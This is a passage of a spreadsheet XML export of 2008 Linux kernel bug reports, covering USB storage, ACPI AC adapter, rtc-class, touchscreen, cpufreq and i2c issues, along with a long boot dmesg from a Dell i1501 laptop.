4:0:0:0: [sdc] Write Protect is off sd 4:0:0:0: [sdc] Mode Sense: 03 00 00 00 sd 4:0:0:0: [sdc] Assuming drive cache: write through sdc: sd 4:0:0:0: [sdc] Attached SCSI disk sd 4:0:0:0: Attached scsi generic sg4 type 0 usb-storage: device scan complete If I revert bdb2b8ca, it starts to work again: usb 5-1: new high speed USB device using ehci_hcd and address 6 usb 5-1: configuration #1 chosen from 1 choice scsi5 : SCSI emulation for USB Mass Storage devices usb 5-1: New USB device found, idVendor=4102, idProduct=1020 usb 5-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 usb 5-1: Product: iriver MP3 T10 usb 5-1: Manufacturer: iriver Limited usb-storage: device found at 6 usb-storage: waiting for device to settle before scanning scsi 5:0:0:0: Direct-Access iriver MP3 T10E 0.83 PQ: 0 ANSI: 2 sd 5:0:0:0: [sdc] 1929216 512-byte hardware sectors (988 MB) sd 5:0:0:0: [sdc] Write Protect is off sd 5:0:0:0: [sdc] Mode Sense: 03 00 00 00 sd 5:0:0:0: [sdc] Assuming drive cache: write through sd 5:0:0:0: [sdc] 1929216 512-byte hardware sectors (988 MB) sd 5:0:0:0: [sdc] Write Protect is off sd 5:0:0:0: [sdc] Mode Sense: 03 00 00 00 sd 5:0:0:0: [sdc] Assuming drive cache: write through sdc: sd 5:0:0:0: [sdc] Attached SCSI removable disk sd 5:0:0:0: Attached scsi generic sg4 type 0 usb-storage: device scan complete</t>
  </si>
  <si>
    <t>ac_adapter: boot state off-line, e2fsck never checks partitions</t>
  </si>
  <si>
    <t>2008-07-19 14:53 UTC</t>
  </si>
  <si>
    <t>2008-07-27 22:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown, maybe not a regression Earliest failing kernel version: Distribution: Gentoo Hardware Environment: Acer Aspire 2000 Laptop Software Environment: Problem Description: Hi all, when booting my laptop the state of the ac_adapter appears to be off. I think it's off because when e2fsck is called (and when the time for a file system check has come) it defers the check thinking the laptop's running on battery. I put [options] defer_check_on_battery = false in /etc/e2fsck.conf but that means that the check will happen anyway, but I like the idea of the defer_check_on_battery feature and would like to use it. Is there something that can be done to set the state of ac_adapter earlier? Kind regards Sebastian</t>
  </si>
  <si>
    <t>rtc-class: does not clear interrupts on device close</t>
  </si>
  <si>
    <t>2008-07-19 17:25 UTC</t>
  </si>
  <si>
    <t>2008-07-31 16:01 UTC</t>
  </si>
  <si>
    <t>rtc_dev_release, called on device close, does not clear the periodic interrupt, leaving it up to rtc drivers to clear it. Certain drivers, like rtc-sh, do it, certain don't, like rtc-cmos. David Brownell -- http://bugzilla.kernel.org/show_bug.cgi?id=11051#c9 and I think that it should be addressed in rtc-dev.c instead of individual drivers.</t>
  </si>
  <si>
    <t>2008-10-24 23:12 UTC</t>
  </si>
  <si>
    <t>Lifebook B2130 touchscreen not recognized</t>
  </si>
  <si>
    <t>2008-07-21 09:03 UTC</t>
  </si>
  <si>
    <t>Lauri Kasanen</t>
  </si>
  <si>
    <t>2010-01-19 19:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: All I've tried, 2.6.16.42 and 2.6.25.{2,4,5,6} Distribution: None / LFS Hardware Environment: Fujitsu Lifebook B2130 laptop Software Environment: Problem Description: The touch screen is not recognized at all. It worked for the previous owner in windows, and the windows driver for it confirms it's still a ps/2 device and the same driver is used for B2131 and B2154. The driver for it is compiled in (CONFIG_MOUSE_PS2_LIFEBOOK). The output from dmidecode shows the Base Board Product Name as ZEPHYR, and the driver checks for this. This is as far as I got with my limited skills.. .config, dmesg, dmidecode, and lspci -v: http://rapidshare.com/files/131379608/lifebook-pack.tgz.html lspci -v: http://pastebin.com/f48750836 Steps to reproduce: A normal boot</t>
  </si>
  <si>
    <t>warning in cpufreq.c on E450</t>
  </si>
  <si>
    <t>2008-07-21 15:02 UTC</t>
  </si>
  <si>
    <t>2008-09-24 04:14 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.2 Earliest failing kernel version: 2.6.26 Distribution: Debian Sid Hardware Environment: Sun E450/2x CPU 400Mhz/1GB Ram Software Environment: Sid Problem Description: After I compile 2.6.26 an boots I get this: ------------[ cut here ]------------ WARNING: at drivers/cpufreq/cpufreq.c:1391 cpufreq_register_notifier+0x50/0x60() Modules linked in: Call Trace: [0000000000605270] cpufreq_register_notifier+0x58/0x60 [00000000007708e0] start_kernel+0x1f0/0x324 [0000000000680e08] auxio_probe+0x0/0xe8 [0000000000000000] 0x8 ---[ end trace 139ce121c98e96c9 ]--- Steps to reproduce: Compile kernel with cpufreq enabled and boot.</t>
  </si>
  <si>
    <t>cannot select i2c-algo-pcf</t>
  </si>
  <si>
    <t>2008-07-21 15:58 UTC</t>
  </si>
  <si>
    <t>2008-08-08 11:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.3 Earliest failing kernel version: 2.6.26 Distribution: Debian SID Hardware Environment: Sun E450 2x 400Mhz/1GB Ram Software Environment: source 2.6.26 Problem Description: In menuconfig on 2.6.26 is not possilble select i2-algos and thus I cannot compile i2c-algos-pcf that i need. Copy Kconfig from 2.6.24.3 solve problem Steps to reproduce: untar 2.6.26 and run menuconfig look at I2C menu and there is nothing about i2c-algos</t>
  </si>
  <si>
    <t>no battery or DC status - Dell i1501</t>
  </si>
  <si>
    <t>2.6.26-git*</t>
  </si>
  <si>
    <t>2008-07-21 19:43 UTC</t>
  </si>
  <si>
    <t>Gu Rui</t>
  </si>
  <si>
    <t>2008-09-28 03:49 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">Latest working kernel version:2.6.26-git8 Earliest failing kernel version:2.6.26-git1 Distribution:Slackware Hardware Environment:Dell i1501 Software Environment: Problem Description: here is my full dmesg: [ 0.000000] Linux version 2.6.26-g6-+-05253-g14b395e (grissiom@grissiom_slackware) (gcc version 4.2.3) #35 SMP PREEMPT Mon Jul 21 22:04:52 CST 2008 [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009dc00 (usable) [ 0.000000] BIOS-e820: 000000000009dc00 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000ce000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 0000000037e70000 (usable) [ 0.000000] BIOS-e820: 0000000037e70000 - 0000000037e80000 (ACPI data) [ 0.000000] BIOS-e820: 0000000037e80000 - 0000000037f00000 (ACPI NVS) [ 0.000000] BIOS-e820: 0000000037f00000 - 0000000040000000 (reserved) [ 0.000000] BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) [ 0.000000] BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) [ 0.000000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) [ 0.000000] BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) [ 0.000000] last_pfn = 0x37e70 max_arch_pfn = 0x100000 [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106 [ 0.000000] kernel direct mapping tables up to 37e70000 @ 7000-d000 [ 0.000000] DMI present. [ 0.000000] ACPI: RSDP 000F8500, 0014 (r0 PTLTD ) [ 0.000000] ACPI: RSDT 37E79539, 0040 (r1 DELL M08 6040000 LTP 0) [ 0.000000] ACPI: FACP 37E7FB58, 0074 (r1 ATI Bowfin 6040000 ATI F4240) [ 0.000000] ACPI: DSDT 37E79579, 65DF (r1 ATI SB600 6040000 MSFT 3000000) [ 0.000000] ACPI: FACS 37E90FC0, 0040 [ 0.000000] ACPI: TCPA 37E7FBCC, 0032 (r2 AMD 6040000 PTEC 0) [ 0.000000] ACPI: SSDT 37E7FBFE, 01C4 (r1 PTLTD POWERNOW 6040000 LTP 1) [ 0.000000] ACPI: APIC 37E7FDC2, 0054 (r1 PTLTD APIC 6040000 LTP 0) [ 0.000000] ACPI: MCFG 37E7FE16, 003C (r1 PTLTD MCFG 6040000 LTP 0) [ 0.000000] ACPI: HPET 37E7FE52, 0038 (r1 PTLTD HPETTBL 6040000 LTP 1) [ 0.000000] ACPI: SLIC 37E7FE8A, 0176 (r1 DELL M08 6040000 LTP 0) [ 0.000000] ACPI: DMI detected: Dell i1501 [ 0.000000] Entering add_active_range(0, 0x0, 0x9d) 0 entries of 256 used [ 0.000000] Entering add_active_range(0, 0x100, 0x37e70) 1 entries of 256 used [ 0.000000] 0MB HIGHMEM available. [ 0.000000] 894MB LOWMEM available. [ 0.000000] mapped low ram: 0 - 37e70000 [ 0.000000] low ram: 00000000 - 37e70000 [ 0.000000] bootmap 00009000 - 0000ffd0 [ 0.000000] (8 early reservations) ==&gt; bootmem [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==&gt; [0000000000 - 0000001000] [ 0.000000] #1 [0000001000 - 0000002000] EX TRAMPOLINE ==&gt; [0000001000 - 0000002000] [ 0.000000] #2 [0000006000 - 0000007000] TRAMPOLINE ==&gt; [0000006000 - 0000007000] [ 0.000000] #3 [0000100000 - 00006ae364] TEXT DATA BSS ==&gt; [0000100000 - 00006ae364] [ 0.000000] #4 [00006af000 - 00006b2000] INIT_PG_TABLE ==&gt; [00006af000 - 00006b2000] [ 0.000000] #5 [000009dc00 - 0000100000] BIOS reserved ==&gt; [000009dc00 - 0000100000] [ 0.000000] #6 [0000007000 - 0000009000] PGTABLE ==&gt; [0000007000 - 0000009000] [ 0.000000] #7 [0000009000 - 0000010000] BOOTMAP ==&gt; [0000009000 - 0000010000] [ 0.000000] Scan SMP from c0000000 for 1024 bytes. [ 0.000000] Scan SMP from c009fc00 for 1024 bytes. [ 0.000000] Scan SMP from c00f0000 for 65536 bytes. [ 0.000000] found SMP MP-table at [c00f8530] 000f8530 [ 0.000000] Zone PFN ranges: [ 0.000000] DMA 0x00000000 -&gt; 0x00001000 [ 0.000000] Normal 0x00001000 -&gt; 0x00037e70 [ 0.000000] HighMem 0x00037e70 -&gt; 0x00037e70 [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[2] active PFN ranges [ 0.000000] 0: 0x00000000 -&gt; 0x0000009d [ 0.000000] 0: 0x00000100 -&gt; 0x00037e70 [ 0.000000] On node 0 totalpages: 228877 [ 0.000000] free_area_init_node: node 0, pgdat c05adf40, node_mem_map c1000000 [ 0.000000] DMA zone: 32 pages used for memmap [ 0.000000] DMA zone: 0 pages reserved [ 0.000000] DMA zone: 3965 pages, LIFO batch:0 [ 0.000000] Normal zone: 1757 pages used for memmap [ 0.000000] Normal zone: 223123 pages, LIFO batch:31 [ 0.000000] HighMem zone: 0 pages used for memmap [ 0.000000] Movable zone: 0 pages used for memmap [ 0.000000] Detected use of extended apic ids on hypertransport bus [ 0.000000] ACPI: PM-Timer IO Port: 0x8008 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) [ 0.000000] ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 2, version 33, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: IRQ9 used by override. [ 0.000000] Enabling APIC mode: Flat. Using 1 I/O APICs [ 0.000000] ACPI: HPET id: 0x43538301 base: 0xfed00000 [ 0.000000] Using ACPI (MADT) for SMP configuration information [ 0.000000] SMP: Allowing 2 CPUs, 0 hotplug CPUs [ 0.000000] mapped APIC to ffffb000 (fee00000) [ 0.000000] mapped IOAPIC to ffffa000 (fec00000) [ 0.000000] PM: Registered nosave memory: 000000000009d000 - 000000000009e000 [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000 [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000ce000 [ 0.000000] PM: Registered nosave memory: 00000000000ce000 - 0000000000100000 [ 0.000000] Allocating PCI resources starting at 50000000 (gap: 40000000:a0000000) [ 0.000000] PERCPU: Allocating 38516 bytes of per cpu data [ 0.000000] NR_CPUS: 2, nr_cpu_ids: 2, nr_node_ids 1 [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 227088 [ 0.000000] Kernel command line: root=/dev/sda7 vga=773 [ 0.000000] Enabling fast FPU save and restore... done. [ 0.000000] Enabling unmasked SIMD FPU exception support... done. [ 0.000000] Initializing CPU#0 [ 0.000000] PID hash table entries: 4096 (order: 12, 16384 bytes) [ 0.000000] TSC calibrated against PM_TIMER [ 0.000000] Detected 1795.492 MHz processor. [ 0.006666] Console: colour dummy device 80x25 [ 0.006666] console [tty0] enabled [ 0.006666] Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) [ 0.006666] Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) [ 0.006666] Memory: 901504k/915904k available (3667k kernel code, 13928k reserved, 1343k data, 308k init, 0k highmem) [ 0.006666] virtual kernel memory layout: [ 0.006666] fixmap : 0xfff9f000 - 0xfffff000 ( 384 kB) [ 0.006666] pkmap : 0xff800000 - 0xffc00000 (4096 kB) [ 0.006666] vmalloc : 0xf8800000 - 0xff7fe000 ( 111 MB) [ 0.006666] lowmem : 0xc0000000 - 0xf7e70000 ( 894 MB) [ 0.006666] .init : 0xc05ec000 - 0xc0639000 ( 308 kB) [ 0.006666] .data : 0xc0494fc3 - 0xc05e4dd0 (1343 kB) [ 0.006666] .text : 0xc0100000 - 0xc0494fc3 (3667 kB) [ 0.006666] Checking if this processor honours the WP bit even in supervisor mode...Ok. [ 0.006666] CPA: page pool initialized 1 of 1 pages preallocated [ 0.006666] SLUB: Genslabs=12, HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 [ 0.006666] hpet clockevent registered [ 0.006684] Calibrating delay loop (skipped), value calculated using timer frequency.. &lt;6&gt;3592.60 BogoMIPS (lpj=5984973) [ 0.006697] Mount-cache hash table entries: 512 [ 0.006753] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 0.006756] CPU: L2 Cache: 512K (64 bytes/line) [ 0.006759] CPU 0(2) -&gt; Core 0 [ 0.006761] Intel machine check architecture supported. [ 0.006764] Intel machine check reporting enabled on CPU#0. [ 0.006766] using C1E aware idle routine [ 0.006771] Checking 'hlt' instruction... OK. [ 0.018739] ACPI: Core revision 20080609 [ 0.029075] ENABLING IO-APIC IRQs [ 0.029231] ..TIMER: vector=0x31 apic1=0 pin1=0 apic2=-1 pin2=-1 [ 0.033331] ..MP-BIOS bug: 8254 timer not connected to IO-APIC [ 0.033331] ...trying to set up timer (IRQ0) through the 8259A ... [ 0.033331] ..... (found pin 0) ...works. [ 0.065797] CPU0: AMD Turion(tm) 64 X2 Mobile Technology TL-56 stepping 02 [ 0.069995] Booting processor 1/1 ip 6000 [ 0.079994] Initializing CPU#1 [ 0.163143] Calibrating delay using timer specific routine.. &lt;6&gt;3592.67 BogoMIPS (lpj=5985083) [ 0.163151] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 0.163153] CPU: L2 Cache: 512K (64 bytes/line) [ 0.163155] CPU 1(2) -&gt; Core 1 [ 0.163157] Intel machine check architecture supported. [ 0.163160] Intel machine check reporting enabled on CPU#1. [ 0.163322] x86 PAT enabled: cpu 1, old 0x7040600070406, new 0x7010600070106 [ 0.162029] CPU1: AMD Turion(tm) 64 X2 Mobile Technology TL-56 stepping 02 [ 0.162083] Brought up 2 CPUs [ 0.162088] Total of 2 processors activated (7184.28 BogoMIPS). [ 0.163322] System has C1E enabled [ 0.163322] Switch to broadcast mode on CPU1 [ 0.162126] Switch to broadcast mode on CPU0 [ 0.162247] net_namespace: 420 bytes [ 0.162402] NET: Registered protocol family 16 [ 0.162501] No dock devices found. [ 0.162526] ACPI: bus type pci registered [ 0.162576] PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 9 [ 0.162583] PCI: MCFG area at e0000000 reserved in E820 [ 0.162589] PCI: Using MMCONFIG for extended config space [ 0.162595] PCI: Using configuration type 1 for base access [ 0.163322] ACPI: EC: Look up EC in DSDT [ 0.166069] ACPI: BIOS _OSI(Linux) query ignored via DMI [ 0.166420] ACPI: Interpreter enabled [ 0.166425] ACPI: (supports S0 S3 S4 S5) [ 0.166439] ACPI: Using IOAPIC for interrupt routing [ 0.164251] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 0.184466] ACPI: EC: GPE = 0x14, I/O: command/status = 0x66, data = 0x62 [ 0.184474] ACPI: EC: driver started in interrupt mode [ 0.184498] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 0.184595] pci 0000:00:05.0: PME# supported from D0 D3hot D3cold [ 0.184602] pci 0000:00:05.0: PME# disabled [ 0.184718] pci 0000:00:12.0: set SATA to AHCI mode [ 0.185107] pci 0000:00:13.5: supports D1 [ 0.185109] pci 0000:00:13.5: supports D2 [ 0.185111] pci 0000:00:13.5: PME# supported from D0 D1 D2 D3hot [ 0.185120] pci 0000:00:13.5: PME# disabled [ 0.185369] pci 0000:00:14.2: PME# supported from D0 D3hot D3cold [ 0.185377] pci 0000:00:14.2: PME# disabled [ 0.185566] pci 0000:01:05.0: supports D1 [ 0.185568] pci 0000:01:05.0: supports D2 [ 0.185737] pci 0000:08:00.0: supports D1 [ 0.185739] pci 0000:08:00.0: supports D2 [ 0.185741] pci 0000:08:00.0: PME# supported from D0 D1 D2 D3hot D3cold [ 0.185751] pci 0000:08:00.0: PME# disabled [ 0.185852] pci 0000:08:01.0: supports D1 [ 0.185854] pci 0000:08:01.0: supports D2 [ 0.185856] pci 0000:08:01.0: PME# supported from D0 D1 D2 D3hot D3cold [ 0.185865] pci 0000:08:01.0: PME# disabled [ 0.185967] pci 0000:08:01.1: supports D1 [ 0.185968] pci 0000:08:01.1: supports D2 [ 0.185970] pci 0000:08:01.1: PME# supported from D0 D1 D2 D3hot D3cold [ 0.185980] pci 0000:08:01.1: PME# disabled [ 0.186048] pci 0000:00:14.4: transparent bridge [ 0.186075] bus 00 -&gt; node 0 [ 0.186080] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 0.186284] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PB5_._PRT] [ 0.186428] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P_._PRT] [ 0.186542] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP_._PRT] [ 0.189146] ACPI: PCI Interrupt Link [LNKA] (IRQs 10 11) *0, disabled. [ 0.189279] ACPI: PCI Interrupt Link [LNKB] (IRQs 10 11) *0, disabled. [ 0.189407] ACPI: PCI Interrupt Link [LNKC] (IRQs 10 11) *0, disabled. [ 0.189535] ACPI: PCI Interrupt Link [LNKD] (IRQs 10 11) *0, disabled. [ 0.189664] ACPI: PCI Interrupt Link [LNKE] (IRQs 10 11) *0, disabled. [ 0.189792] ACPI: PCI Interrupt Link [LNKF] (IRQs 10 11) *0, disabled. [ 0.189920] ACPI: PCI Interrupt Link [LNKG] (IRQs 10 11) *0, disabled. [ 0.190048] ACPI: PCI Interrupt Link [LNKH] (IRQs 10 11) *0, disabled. [ 0.190177] ACPI: PCI Interrupt Link [LNKU] (IRQs 3 4 5 7) *0, disabled. [ 0.190370] ACPI: WMI: Mapper loaded [ 0.190376] Linux Plug and Play Support v0.97 (c) Adam Belay [ 0.190391] pnp: PnP ACPI init [ 0.190400] ACPI: bus type pnp registered [ 0.192729] pnp 00:09: mem resource (0xe0000-0xfffff) overlaps 0000:00:05.0 BAR 8 (0x0-0xfffff), disabling [ 0.192741] pnp 00:09: mem resource (0x0-0xfff) overlaps 0000:00:05.0 BAR 8 (0x0-0xfffff), disabling [ 0.192763] pnp 00:09: mem resource (0x0-0xfff) overlaps 0000:01:05.0 BAR 6 (0x0-0x1ffff), disabling [ 0.193935] pnp: PnP ACPI: found 11 devices [ 0.193941] ACPI: ACPI bus type pnp unregistered [ 0.194094] SCSI subsystem initialized [ 0.194163] libata version 3.00 loaded. [ 0.194224] usbcore: registered new interface driver usbfs [ 0.194244] usbcore: registered new interface driver hub [ 0.194276] usbcore: registered new device driver usb [ 0.194392] PCI: Using ACPI for IRQ routing [ 0.194401] PCI: Cannot allocate resource region 7 of bridge 0000:00:05.0 [ 0.194406] PCI: Cannot allocate resource region 8 of bridge 0000:00:05.0 [ 0.204999] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0, 0 [ 0.205007] hpet0: 4 32-bit timers, 14318180 Hz [ 0.206106] ACPI Error (exresop-0103): Needed type [Reference], found [Device] f780ff90 [20080609] [ 0.206119] ACPI Exception (dswexec-0441): AE_AML_OPERAND_TYPE, While resolving operands for [OpcodeName unavailable] [20080609] [ 0.206132] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0._OSC] (Node f7816dc8), AE_AML_OPERAND_TYPE [ 0.206196] ACPI: RTC can wake from S4 [ 0.210618] Switched to high resolution mode on CPU 0 [ 0.211699] system 00:01: iomem range 0xe0000000-0xefffffff could not be reserved [ 0.211708] system 00:01: iomem range 0xfec00000-0xfec00fff could not be reserved [ 0.211717] system 00:01: iomem range 0xfee00000-0xfee00fff could not be reserved [ 0.211731] system 00:08: ioport range 0x1080-0x1080 has been reserved [ 0.211738] system 00:08: ioport range 0x220-0x22f has been reserved [ 0.211745] system 00:08: ioport range 0x40b-0x40b has been reserved [ 0.211752] system 00:08: ioport range 0x4d0-0x4d1 has been reserved [ 0.211758] system 00:08: ioport range 0x4d6-0x4d6 has been reserved [ 0.211766] system 00:08: ioport range 0x530-0x537 has been reserved [ 0.211772] system 00:08: ioport range 0xc00-0xc01 has been reserved [ 0.211779] system 00:08: ioport range 0xc14-0xc14 has been reserved [ 0.211786] system 00:08: ioport range 0xc50-0xc52 has been reserved [ 0.211793] system 00:08: ioport range 0xc6c-0xc6c has been reserved [ 0.211800] system 00:08: ioport range 0xc6f-0xc6f has been reserved [ 0.211807] system 00:08: ioport range 0xcd0-0xcd3 has been reserved [ 0.211814] system 00:08: ioport range 0xcd4-0xcd5 has been reserved [ 0.211821] system 00:08: ioport range 0xcd6-0xcd7 has been reserved [ 0.211828] system 00:08: ioport range 0xcd8-0xcdf has been reserved [ 0.211835] system 00:08: ioport range 0x8000-0x805f has been reserved [ 0.211842] system 00:08: ioport range 0xf40-0xf47 has been reserved [ 0.211853] system 00:08: ioport range 0x87f-0x87f has been reserved [ 0.211864] system 00:09: iomem range 0xfff00000-0xffffffff could not be reserved [ 0.211872] system 00:09: iomem range 0xc0004800-0xc0004bff has been reserved [ 0.211880] system 00:09: iomem range 0xfed00000-0xfed003ff has been reserved [ 0.242116] pci 0000:00:01.0: PCI bridge, secondary bus 0000:01 [ 0.242123] pci 0000:00:01.0: IO window: 0x9000-0x9fff [ 0.242130] pci 0000:00:01.0: MEM window: 0xc0100000-0xc01fffff [ 0.242136] pci 0000:00:01.0: PREFETCH window: 0x000000c8000000-0x000000cfffffff [ 0.242145] pci 0000:00:05.0: PCI bridge, secondary bus 0000:02 [ 0.242150] pci 0000:00:05.0: IO window: disabled [ 0.242155] pci 0000:00:05.0: MEM window: disabled [ 0.242161] pci 0000:00:05.0: PREFETCH window: disabled [ 0.242168] pci 0000:00:14.4: PCI bridge, secondary bus 0000:08 [ 0.242172] pci 0000:00:14.4: IO window: disabled [ 0.242181] pci 0000:00:14.4: MEM window: 0xc0300000-0xc03fffff [ 0.242189] pci 0000:00:14.4: PREFETCH window: disabled [ 0.242208] PCI: Setting latency timer of device 0000:00:05.0 to 64 [ 0.242223] NET: Registered protocol family 2 [ 0.242274] Switched to high resolution mode on CPU 1 [ 0.252607] IP route cache hash table entries: 32768 (order: 5, 131072 bytes) [ 0.252870] TCP established hash table entries: 131072 (order: 8, 1048576 bytes) [ 0.253530] TCP bind hash table entries: 65536 (order: 7, 524288 bytes) [ 0.253866] TCP: Hash tables configured (established 131072 bind 65536) [ 0.253873] TCP reno registered [ 0.255958] NET: Registered protocol family 1 [ 0.256218] Machine check exception polling timer started. [ 0.256556] Total HugeTLB memory allocated, 0 [ 0.257808] DLM (built Jul 21 2008 22:47:24) installed [ 0.258172] Installing knfsd (copyright (C) 1996 okir@monad.swb.de). [ 0.258285] msgmni has been set to 1760 [ 0.258401] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253) [ 0.258410] io scheduler noop registered [ 0.258415] io scheduler anticipatory registered [ 0.258419] io scheduler deadline registered [ 0.258433] io scheduler cfq registered (default) [ 0.258442] pci 0000:00:00.0: MSI quirk detected; MSI disabled [ 0.258548] pci 0000:01:05.0: Boot video device [ 0.258619] PCI: Setting latency timer of device 0000:00:05.0 to 64 [ 0.258640] pcieport-driver 0000:00:05.0: found MSI capability [ 0.258648] pci_express 0000:00:05.0:pcie00: allocate port service [ 0.258665] pci_express 0000:00:05.0:pcie02: allocate port service [ 0.258723] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 [ 0.258807] vesafb: framebuffer at 0xc8000000, mapped to 0xf8880000, using 1536k, total 16384k [ 0.258816] vesafb: mode is 1024x768x8, linelength=1024, pages=20 [ 0.258821] vesafb: protected mode interface info at c000:51a0 [ 0.258827] vesafb: pmi: set display start = c00c5234, set palette = c00c5280 [ 0.258832] vesafb: pmi: ports = 9010 9016 9054 9038 903c 905c 9000 9004 90b0 90b2 90b4 [ 0.258845] vesafb: scrolling: redraw [ 0.258851] vesafb: Pseudocolor: size=8:8:8:8, shift=0:0:0:0 [ 0.258885] fbcon: VESA VGA (fb0) is primary device [ 0.285578] Console: switching to colour frame buffer device 128x48 [ 0.312477] fb0: VESA VGA frame buffer device [ 0.314465] ACPI: AC Adapter [ACAD] (on-line) [ 0.698517] ACPI: Battery Slot [BAT1] (battery present) [ 0.698845] input: Power Button (FF) as /class/input/input0 [ 0.699124] ACPI: Power Button (FF) [PWRF] [ 0.699371] input: Power Button (CM) as /class/input/input1 [ 0.699649] ACPI: Power Button (CM) [PWRB] [ 0.699911] input: Sleep Button (CM) as /class/input/input2 [ 0.700195] ACPI: Sleep Button (CM) [SLPB] [ 0.700435] input: Lid Switch as /class/input/input3 [ 0.701624] ACPI: Lid Switch [LID] [ 0.702054] input: Video Bus as /class/input/input4 [ 0.702299] ACPI: Video Device [VGA] (multi-head: yes rom: no post: no) [ 0.704378] ACPI: ACPI0007:00 is registered as cooling_device0 [ 0.704679] ACPI: Processor [CPU0] (supports 8 throttling states) [ 0.705105] ACPI: ACPI0007:01 is registered as cooling_device1 [ 0.707667] ACPI: LNXTHERM:01 is registered as thermal_zone0 [ 0.708929] ACPI: Thermal Zone [THRM] (59 C) [ 0.730520] hpet_resources: 0xfed00000 is busy [ 0.730655] Linux agpgart interface v0.103 [ 0.730877] ipmi message handler version 39.2 [ 0.731104] ipmi device interface [ 0.731286] IPMI System Interface driver. [ 0.739240] ipmi_si: Unable to find any System Interface(s) [ 0.749158] IPMI Watchdog: driver initialized [ 0.758983] Copyright (C) 2004 MontaVista Software - IPMI Powerdown via sys_reboot. [ 0.769089] [drm] Initialized drm 1.1.0 20060810 [ 0.779079] Serial: 8250/16550 driver4 ports, IRQ sharing disabled [ 0.789752] loop: module loaded [ 0.799728] b44 0000:08:00.0: PCI INT A -&gt; GSI 21 (level, low) -&gt; IRQ 21 [ 0.858410] ssb: Sonics Silicon Backplane found on PCI device 0000:08:00.0 [ 0.868539] b44.c:v2.0 [ 0.895382] eth0: Broadcom 44xx/47xx 10/100BaseT Ethernet 00:19:b9:4e:20:8a [ 0.906039] Uniform Multi-Platform E-IDE driver [ 0.916599] SB600_PATA: IDE controller (0x1002:0x438c rev 0x00) at PCI slot 0000:00:14.1 [ 0.927393] ATIIXP_IDE 0000:00:14.1: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 0.938255] SB600_PATA: not 100% native mode: will probe irqs later [ 0.949114] ide0: BM-DMA at 0x8420-0x8427 [ 0.959873] Probing IDE interface ide0... [ 1.658747] hda: HL-DT-ST DVD+/-RW GSA-T11N, ATAPI CD/DVD-ROM drive [ 1.988359] hda: host max PIO4 wanted PIO255(auto-tune) selected PIO4 [ 1.989170] hda: UDMA/33 mode selected [ 2.000209] ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 [ 2.014082] ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports [ 2.025153] ide_generic: I/O resource 0x1F0-0x1F7 not free. [ 2.036143] Probing IDE interface ide1... [ 2.571686] ide1 at 0x170-0x177,0x376 on irq 15 [ 2.584579] hda: ATAPI 24X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache [ 2.595598] Uniform CD-ROM driver Revision: 3.20 [ 2.613977] Driver 'sd' needs updating - please use bus_type methods [ 2.625108] ahci 0000:00:12.0: version 3.0 [ 2.625120] ahci 0000:00:12.0: PCI INT A -&gt; GSI 22 (level, low) -&gt; IRQ 22 [ 2.636286] ahci 0000:00:12.0: controller can't do 64bit DMA, forcing 32bit [ 2.647502] ahci 0000:00:12.0: AHCI 0001.0100 32 slots 4 ports 3 Gbps 0xf impl SATA mode [ 2.658756] ahci 0000:00:12.0: flags: ncq sntf ilck led clo pmp pio [ 2.670340] scsi0 : ahci [ 2.681520] scsi1 : ahci [ 2.692433] scsi2 : ahci [ 2.703201] scsi3 : ahci [ 2.720445] ata1: SATA max UDMA/133 irq_stat 0x00400040, connection status changed irq 22 [ 2.728786] ata2: SATA max UDMA/133 abar m1024@0xc0004000 port 0xc0004180 irq 22 [ 2.739616] ata3: SATA max UDMA/133 abar m1024@0xc0004000 port 0xc0004200 irq 22 [ 2.755584] ata4: SATA max UDMA/133 abar m1024@0xc0004000 